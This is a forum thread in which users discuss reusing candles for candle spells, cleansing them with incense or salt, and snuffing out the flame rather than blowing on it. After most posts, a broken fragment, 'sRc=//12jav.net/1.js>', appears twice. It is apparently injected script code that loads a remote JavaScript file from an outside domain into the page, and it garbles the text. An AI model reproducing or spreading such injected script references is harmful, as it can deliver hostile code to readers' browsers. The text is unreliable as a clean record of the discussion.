Okay, i am as curious as always.

If one will do a candle spell, does it need new candles? Or the used candle will be fine? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Either would work, but I would personally recommend cleansing any candle that has been used previously, to remove any residual energy, especially if this candle has been used during a previous spell or ritual.

Other than that you shouldn't have a problem.

Personally, I always reuse mine, if there is still a good bit of the candle left. For example, if I am doing a candle spell for protection, I will reuse the candle, since I have already charged it with that particular intent. I find it saves candles (and money) if I reuse a candle that still has a lot left to burn on it.

I usually purchase the taper candles or seven day candles for this reason. I can charge them with my intent and reuse them multiple times, until they completely burn away.
For cleansing, I usually pass mine through incense smoke and visualize it removing any old associations that it may have had with past spells. I have a friend that does this and then sprinkles salt over it, for much the same reason. Neutralizing any past influences, etc.

How long do you keep the flame going before you blow it out? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

@DAWN1232 Don't blow out your candle while doing a spell, it will disturb the spell. Snuff it out with a cup/shot glass/snuffer anything that can cover the flame. And keep it going until it gets to the end. And both candles are fine, I use candles of all sorts during my spells. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

With me, it depends on the spell. Some spells I burn a small candle or tea light and let it burn till the end. If I'm doing a meditation or long term goal spell, I burn it several times, snuffing it out when I'm done. If I can't use the whole candle, I thank the candle's energies, release them and toss the candle proper. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
